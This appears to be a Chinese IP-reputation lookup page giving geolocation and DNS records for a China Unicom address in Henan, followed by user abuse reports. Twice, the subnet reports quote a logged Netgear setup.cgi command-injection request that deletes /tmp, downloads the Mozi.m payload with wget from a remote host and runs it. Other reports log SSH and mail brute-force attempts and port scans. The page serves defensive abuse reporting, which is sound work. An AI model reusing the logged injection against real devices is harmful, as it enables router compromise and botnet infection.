必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): Laocheng

省份(region): Henan

国家(country): China

运营商(isp): China Unicom

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
IP 类型 评论内容 时间
42.224.25.179 attack
42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-"
...
2020-10-02 01:42:57
42.224.25.179 attack
42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-"
...
2020-10-01 17:49:36
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 42.224.25.30
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7011
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;42.224.25.30.			IN	A

;; AUTHORITY SECTION:
.			196	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022021102 1800 900 604800 86400

;; Query time: 64 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Feb 12 11:54:53 CST 2022
;; MSG SIZE  rcvd: 105
HOST信息:
30.25.224.42.in-addr.arpa domain name pointer hn.kd.ny.adsl.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
30.25.224.42.in-addr.arpa	name = hn.kd.ny.adsl.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
222.186.175.151 attackspam
Nov  3 03:29:24 debian sshd[29869]: Unable to negotiate with 222.186.175.151 port 4636: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 [preauth]
Nov  3 03:38:16 debian sshd[30213]: Unable to negotiate with 222.186.175.151 port 65270: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 [preauth]
...
2019-11-03 16:45:08
185.156.73.21 attackbotsspam
Scanning (more than 2 packets) random ports - tries to find possible vulnerable services
2019-11-03 16:42:35
46.38.144.17 attack
2019-11-03T09:34:44.181793mail01 postfix/smtpd[7533]: warning: unknown[46.38.144.17]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
2019-11-03T09:34:51.149493mail01 postfix/smtpd[13046]: warning: unknown[46.38.144.17]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
2019-11-03T09:35:08.056619mail01 postfix/smtpd[7533]: warning: unknown[46.38.144.17]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
2019-11-03 16:36:45
221.125.165.144 attack
8080/tcp 5984/tcp 23/tcp...
[2019-09-06/11-03]11pkt,4pt.(tcp)
2019-11-03 16:38:25
36.73.109.46 attackbots
445/tcp 445/tcp
[2019-11-01]2pkt
2019-11-03 16:48:54
185.209.0.18 attackspam
Scanning (more than 2 packets) random ports - tries to find possible vulnerable services
2019-11-03 17:04:30
14.102.152.182 attack
445/tcp 445/tcp 445/tcp
[2019-11-03]3pkt
2019-11-03 17:03:14
213.177.107.170 attack
postfix (unknown user, SPF fail or relay access denied)
2019-11-03 16:54:31
183.192.247.173 attackbotsspam
DATE:2019-11-03 06:52:07, IP:183.192.247.173, PORT:telnet - Telnet brute force auth on a honeypot server (epe-dc)
2019-11-03 17:06:22
112.85.42.238 attackspambots
Nov  3 09:54:45 h2177944 sshd\[19579\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.238  user=root
Nov  3 09:54:47 h2177944 sshd\[19579\]: Failed password for root from 112.85.42.238 port 53996 ssh2
Nov  3 09:54:49 h2177944 sshd\[19579\]: Failed password for root from 112.85.42.238 port 53996 ssh2
Nov  3 09:54:52 h2177944 sshd\[19579\]: Failed password for root from 112.85.42.238 port 53996 ssh2
...
2019-11-03 17:07:53
112.91.90.9 attackbots
1433/tcp 1433/tcp
[2019-10-28/11-03]2pkt
2019-11-03 16:40:50
222.186.175.216 attack
pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.216  user=root
Failed password for root from 222.186.175.216 port 10854 ssh2
Failed password for root from 222.186.175.216 port 10854 ssh2
Failed password for root from 222.186.175.216 port 10854 ssh2
Failed password for root from 222.186.175.216 port 10854 ssh2
2019-11-03 16:40:26
92.253.12.46 attack
60001/tcp 60001/tcp 60001/tcp
[2019-11-01/02]3pkt
2019-11-03 16:50:43
157.245.251.97 attackspambots
Nov  3 07:49:07 ip-172-31-62-245 sshd\[17626\]: Invalid user saatatya from 157.245.251.97\
Nov  3 07:49:09 ip-172-31-62-245 sshd\[17626\]: Failed password for invalid user saatatya from 157.245.251.97 port 53274 ssh2\
Nov  3 07:52:44 ip-172-31-62-245 sshd\[17676\]: Invalid user aombeva from 157.245.251.97\
Nov  3 07:52:47 ip-172-31-62-245 sshd\[17676\]: Failed password for invalid user aombeva from 157.245.251.97 port 35582 ssh2\
Nov  3 07:56:26 ip-172-31-62-245 sshd\[17698\]: Invalid user test from 157.245.251.97\
2019-11-03 17:13:28
124.42.117.243 attack
2019-11-03T08:48:42.340449abusebot-2.cloudsearch.cf sshd\[16706\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=124.42.117.243  user=root
2019-11-03 16:50:24

最近上报的IP列表

2.101.143.15 42.224.66.219 42.225.210.211 42.226.85.181
42.226.73.36 42.226.82.138 42.227.224.146 42.228.102.73
42.227.210.66 42.228.44.96 42.226.113.67 42.227.208.244
42.228.99.220 42.228.41.46 42.228.216.118 42.229.217.52
42.229.128.40 42.229.254.81 42.229.253.215 42.230.112.252